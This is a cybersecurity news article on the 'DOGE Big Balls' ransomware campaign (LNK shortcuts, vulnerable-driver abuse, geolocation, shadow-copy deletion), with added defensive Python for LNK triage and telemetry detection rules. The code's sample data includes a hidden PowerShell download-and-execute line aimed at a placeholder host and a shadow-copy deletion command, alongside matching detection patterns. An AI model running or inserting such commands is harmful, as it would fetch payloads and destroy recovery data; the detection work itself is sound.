Saturday, April 26, 2025

DOGE ‘Big Balls’ Ransomware Utilizes ZIP-Based LNK Shortcuts and BYOVD Techniques for Stealthy Attacks


A new and highly sophisticated ransomware campaign, dubbed “DOGE BIG BALLS Ransomware,” has recently come to light, demonstrating a blend of technical innovation and psychological manipulation.

This operation stands out for its multi-stage infection chain, which begins with a seemingly innocuous ZIP file and culminates in the deployment of a customized ransomware payload, all while leveraging advanced evasion techniques.

Infection Chain: ZIP Files and LNK Shortcuts

The attack typically starts with a ZIP file, often themed around financial matters such as “Pay Adjustment.zip.” Inside, a deceptive LNK (shortcut) file masquerades as a PDF or other legitimate document.


When the victim opens this shortcut, it silently executes a series of PowerShell commands.

These commands download and run a script that checks for administrative privileges and, depending on the user’s access level, downloads additional malicious files.

If administrative rights are detected, the script creates a hidden folder in the system’s startup directory and downloads a modified version of the Fog ransomware disguised as “Adobe Acrobat.exe.”

It also retrieves a kernel exploit tool, “ktool.exe,” which is crucial for the next phase of the attack.

For non-admin users, the ransomware is placed in a user-specific startup folder, likely to be triggered later.

The PowerShell scripts used in this campaign are notable for their anti-analysis features and psychological tactics.

They include provocative statements and references to real individuals, likely intended to confuse or intimidate victims and analysts.
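The shortcut stage above can be triaged without ever opening the file. The following Python is an added example (not code from the article or from any vendor it cites): it parses a Shell Link file according to the published MS-SHLLINK layout, then reports the traits an analyst would look for in a "document" shortcut: a target that is a script or command interpreter, hidden-window or download-and-execute switches, and a minimised launch. A small builder produces a constructed sample so the parser can be exercised offline; the PowerShell command line and URL in that sample are placeholders, not the campaign's.

```python
import re
import struct

# Shell Link (.lnk) layout per MS-SHLLINK: a fixed 0x4C-byte header, optional
# LinkTargetIDList and LinkInfo blocks, then StringData fields in a fixed order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046

# LinkFlags bits that say which optional structures are present
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

SW_SHOWNORMAL = 1
SW_SHOWMINNOACTIVE = 7  # launch minimised: common in shortcuts that hide a console window

# StringData fields in the order the format stores them
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Switches and cmdlets typical of download-and-execute shortcuts
SUSPECT_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s|downloadstring|downloadfile|"
    r"invoke-webrequest|invoke-expression|\biex\b", re.I)
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk, without running it."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return info


def triage_lnk(info: dict) -> list:
    """Heuristic reasons a parsed shortcut deserves attention (empty list = nothing notable)."""
    reasons = []
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    if any(tool in target for tool in INTERPRETERS):
        reasons.append("target is a script or command interpreter")
    if SUSPECT_ARGS.search(info.get("arguments", "")):
        reasons.append("arguments contain hidden-window or download-and-execute switches")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window is minimised on launch (SW_SHOWMINNOACTIVE)")
    return reasons


def _string_data(text: str) -> bytes:
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str = "", show_command: int = SW_SHOWNORMAL) -> bytes:
    """Construct a minimal Unicode .lnk (no IDList/LinkInfo) so the parser can be tested offline."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = _string_data(relative_path) + (_string_data(arguments) if arguments else b"")
    return header + body


if __name__ == "__main__":
    # Constructed sample resembling the "PDF" shortcut described above; the URL is a placeholder.
    sample = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "-w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')\"",
                       SW_SHOWMINNOACTIVE)
    parsed = parse_lnk(sample)
    print(parsed["relative_path"], parsed["arguments"])
    for reason in triage_lnk(parsed):
        print(" -", reason)
```

Real shortcuts from a mail gateway or quarantine usually carry a LinkTargetIDList and LinkInfo block as well; the parser skips both using their size fields, so the StringData offsets stay correct. Run it over the extracted contents of a suspicious ZIP before anyone double-clicks.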

BYOVD: Exploiting Vulnerable Drivers

A standout feature of this campaign is its use of the Bring Your Own Vulnerable Driver (BYOVD) technique.

The attackers exploit a known vulnerability in an Intel driver (CVE-2015-2291) to gain kernel-level access.

This allows them to escalate privileges, disable security logging, and ensure the ransomware can operate undetected.

The kernel exploit tool is executed with a process ID and a hardcoded key, acting as an execution guardrail to prevent unauthorized use.

Before encrypting files, the ransomware collects extensive system and network information, including hardware IDs, network configurations, and running processes.

Uniquely, it queries the Wigle.net API using the MAC address of the victim’s router (BSSID) to determine the physical location of the device.

This method provides far more accurate geolocation than traditional IP-based techniques, indicating a highly targeted approach.

Ransomware Execution and Psychological Manipulation

Once executed, the ransomware displays a confirmation prompt, opens a ransom note, and logs its activities.

The ransom note references a real individual, Edward Coristine, and demands payment in Monero cryptocurrency.

The branding and references appear designed to mislead, intimidate, or malign specific individuals or organizations.

After encrypting files with the “.flocked” extension, the ransomware drops ransom notes in every affected folder and deletes shadow volume copies to prevent recovery.

The attack also embeds a Havoc C2 beacon, suggesting the potential for long-term access or further post-encryption activities.

Anti-analysis techniques, such as environment variable checks, are used to evade detection in sandboxed or monitored environments.

To defend against such advanced threats, organizations should:

  • Block execution of untrusted LNK files and PowerShell scripts.
  • Monitor PowerShell activity and process chains for anomalies.
  • Deploy Endpoint Detection and Response (EDR) solutions.
  • Limit administrative privileges and monitor for privilege escalation.
  • Restrict outbound traffic to unauthorized cloud services and monitor for suspicious API calls.
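The monitoring items in that list can be expressed as concrete rules. The following Python is an added example, not code from the article or from any vendor it names: a small rule set run over constructed, Sysmon-style telemetry that models the chain described above (Explorer launching PowerShell with hidden-window or download switches, a payload executing from a Startup folder, a driver loaded from a user-writable path or matching a vulnerable-driver list, shadow-copy deletion, and a non-browser process contacting the Wigle.net API). The driver filename iqvw64e.sys comes from public advisories for CVE-2015-2291, not from the article; every path, hostname and user name in the sample is a placeholder.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal Sysmon-like record; only the fields the rules below need."""
    kind: str          # "process" (creation), "driver" (load) or "network" (connection)
    image: str         # path of the process or driver image
    parent: str = ""   # parent process image (process events)
    cmdline: str = ""  # full command line (process events)
    dest: str = ""     # destination host name (network events)


# Constructed sample list; in practice feed this from Microsoft's vulnerable-driver blocklist.
# iqvw64e.sys is the Intel Ethernet diagnostics driver affected by CVE-2015-2291.
VULNERABLE_DRIVERS = {"iqvw64e.sys"}
USER_WRITABLE = re.compile(r"\\users\\|\\temp\\|\\programdata\\", re.I)
STARTUP_FOLDER = re.compile(r"\\start menu\\programs\\startup\\", re.I)
PS_SUSPECT = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s|downloadstring|"
                        r"downloadfile|invoke-webrequest|invoke-expression|\biex\b", re.I)
SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|"
                           r"win32_shadowcopy", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (rule_id, event_index) pairs for every rule that fires."""
    hits = []
    for i, e in enumerate(events):
        if e.kind == "process":
            if (basename(e.image) in {"powershell.exe", "pwsh.exe"} and basename(e.parent) == "explorer.exe"
                    and PS_SUSPECT.search(e.cmdline)):
                hits.append(("PS_FROM_SHORTCUT", i))       # shortcut double-clicked in Explorer
            if SHADOW_DELETE.search(e.cmdline):
                hits.append(("SHADOW_COPY_DELETE", i))     # recovery inhibition around encryption
            if STARTUP_FOLDER.search(e.image):
                hits.append(("EXEC_FROM_STARTUP", i))      # payload planted in a Startup folder
        elif e.kind == "driver":
            if basename(e.image) in VULNERABLE_DRIVERS or USER_WRITABLE.search(e.image):
                hits.append(("VULN_DRIVER_LOAD", i))       # BYOVD: known-bad or dropped-to-temp driver
        elif e.kind == "network":
            if "wigle.net" in e.dest.lower() and basename(e.image) not in BROWSERS:
                hits.append(("BSSID_GEOLOCATION_LOOKUP", i))  # non-browser process geolocating by BSSID
    return hits


ACROBAT = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Acrobat.exe"
# Constructed telemetry modelled on the chain in the article; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
          "powershell.exe -w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s1')\""),
    Event("process", ACROBAT, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", f'"{ACROBAT}"'),
    Event("driver", r"C:\Users\alice\AppData\Local\Temp\iqvw64e.sys"),
    Event("process", r"C:\Windows\System32\vssadmin.exe", ACROBAT, "vssadmin.exe delete shadows /all /quiet"),
    Event("network", ACROBAT, dest="api.wigle.net"),
    # benign activity that must not fire
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
          r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    Event("driver", r"C:\Windows\System32\drivers\tcpip.sys"),
]

if __name__ == "__main__":
    for rule, idx in evaluate(SAMPLE_EVENTS):
        print(f"{rule:26} event[{idx}] {SAMPLE_EVENTS[idx].image}")
```

Each rule maps to one bullet above: the PowerShell and Startup-folder rules cover process-chain monitoring, the driver rule covers privilege-escalation monitoring, and the Wigle.net rule covers suspicious outbound API calls. The last two sample events show that routine scripted administration and a normal driver load produce no alert.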

The DOGE BIG BALLS ransomware campaign exemplifies the evolving sophistication of cyber threats, combining technical innovation with psychological tactics to maximize impact and evade detection.

Robust, layered security measures are essential to defend against such multi-faceted attacks.


Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.
